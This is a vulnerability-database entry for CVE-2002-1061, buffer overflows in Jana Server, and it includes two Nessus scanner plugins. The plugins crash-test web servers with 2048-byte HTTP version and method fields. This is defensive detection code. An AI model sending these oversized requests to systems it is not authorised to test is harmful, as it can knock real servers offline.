CVE-2002-1061 - Buffer Overflow vulnerability in T. Hauck Jana web Server

Metric | Value |
---|---|
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | PARTIAL |
Integrity impact | PARTIAL |
Availability impact | PARTIAL |

Summary
Multiple buffer overflows in Thomas Hauck Jana Server 2.x through 2.2.1, and 1.4.6 and earlier, allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP GET request with a long major version number, (2) an HTTP GET request to the HTTP proxy on port 3128 with a long major version number, (3) a long OK reply from a POP3 server, and (4) a long SMTP server response.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 7 |
Nessus

Field | Value |
---|---|
NASL family | Web Servers |
NASL id | WWW_TOO_LONG_VERSION.NASL |
description | It was possible to kill the web server by sending an HTTP GET request with a long major version number. An attacker may exploit this vulnerability to make your web server crash continually or even execute arbitrary code on your system. |
last seen | 2020-06-02 |
modified | 2002-08-06 |
plugin id | 11061 |
published | 2002-08-06 |
reporter | This script is Copyright (C) 2002-2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/11061 |
title | Web Server HTTP GET Request Version Number Handling Remote Overflow |

code

```nasl
#
# (C) Tenable Network Security, Inc.
#
# References:
# Date: Fri, 26 Jul 2002 12:12:45 +0400
# From: "3APA3A" <[email protected]>
# To: [email protected]
# Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer
#
# Affected:
# JanaServer 2.2.1 and prior
# JanaServer 1.46 and prior
#

include("compat.inc");

if (description)
{
  script_id(11061);
  script_version("1.36");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/01");

  script_cve_id("CVE-2002-1061");
  script_bugtraq_id(5319, 5320, 5322, 5324);

  script_name(english:"Web Server HTTP GET Request Version Number Handling Remote Overflow");
  script_summary(english:"Tries to crash the web server with a long HTTP version");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web server with a remote buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"It was possible to kill the web server by sending an HTTP GET request with a long major version number.

An attacker may exploit this vulnerability to make your web server crash continually or even execute arbitrary code on your system.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jul/329");
  script_set_attribute(attribute:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/07/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/06");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);
  # All the www_too_long_*.nasl scripts were first declared as
  # ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them:
  # The web server might be killed by those generic tests before Nessus
  # has a chance to perform known attacks for which a patch exists.
  # As ACT_DENIAL are performed one at a time (not in parallel), this reduces
  # the risk of false positives.
  script_copyright(english:"This script is Copyright (C) 2002-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Web Servers");
  script_dependencies("no404.nasl", "http_version.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# This check can take the server down, so it only runs in paranoid mode.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Request line whose HTTP major version field is 2048 bytes long.
r = string("GET / HTTP/", crap(2048), ".O\r\n\r\n");
port = get_http_port(default:80);
# Do not report a server that was already unresponsive before the test.
if (http_is_dead(port:port)) exit(0);

w = http_send_recv_buf(port: port, data: r);
# A server that stopped answering after the oversized request is flagged.
if (http_is_dead(port: port, retry: 3))
{
  security_hole(port);
}
```
Field | Value |
---|---|
NASL family | Web Servers |
NASL id | WWW_TOO_LONG_METHOD.NASL |
description | It was possible to kill the web server by sending an invalid request with a long HTTP method field. A remote attacker may exploit this vulnerability to make the web server crash continually or possibly execute arbitrary code. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 11065 |
published | 2002-08-06 |
reporter | This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/11065 |
title | Web Server HTTP Method Handling Remote Overflow |

code

```nasl
#
# (C) Tenable Network Security, Inc.
#
# Script audit and contributions from Carmichael Security
# Erik Anderson <[email protected]> (nb: domain no longer exists)
# Added BugtraqID and CAN
#

include("compat.inc");

if (description)
{
  script_id(11065);
  script_version("1.35");
  script_cvs_date("Date: 2018/11/15 20:50:26");

  script_cve_id("CVE-2002-1061");
  script_bugtraq_id(5319);

  script_name(english:"Web Server HTTP Method Handling Remote Overflow");
  script_summary(english:"Tries to crash the web server with a long HTTP method");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web server with a remote buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"It was possible to kill the web server by sending an invalid request with a long HTTP method field.

A remote attacker may exploit this vulnerability to make the web server crash continually or possibly execute arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jul/329");
  script_set_attribute(attribute:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/07/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/06");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_family(english:"Web Servers");
  script_category(ACT_DENIAL);
  # All the www_too_long_*.nasl scripts were first declared as
  # ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them:
  # The web server might be killed by those generic tests before Nessus
  # has a chance to perform known attacks for which a patch exists.
  # As ACT_DENIAL are performed one at a time (not in parallel), this reduces
  # the risk of false positives.
  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
  script_dependencies("httpver.nasl", "http_version.nasl", "no404.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# This check can take the server down, so it only runs in paranoid mode.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# 2048-byte HTTP method token built by repeating the marker string.
m = crap(data:"HEADNESSUSNESSUS", length: 2048);
port = get_http_port(default:80);
# Do not report a server that was already unresponsive before the test.
if (http_is_dead(port: port)) exit(0);

w = http_send_recv3(method: m, item: "/", port: port);
# A server that stopped answering after the oversized request is flagged.
if (http_is_dead(port: port, retry: 3)) security_hole(port);
```
References
- http://archives.neohapsis.com/archives/bugtraq/2002-07/0329.html
- http://www.iss.net/security_center/static/9682.php
- http://www.iss.net/security_center/static/9683.php
- http://www.iss.net/security_center/static/9685.php
- http://www.iss.net/security_center/static/9686.php
- http://www.securityfocus.com/bid/5319
- http://www.securityfocus.com/bid/5320
- http://www.securityfocus.com/bid/5322
- http://www.securityfocus.com/bid/5324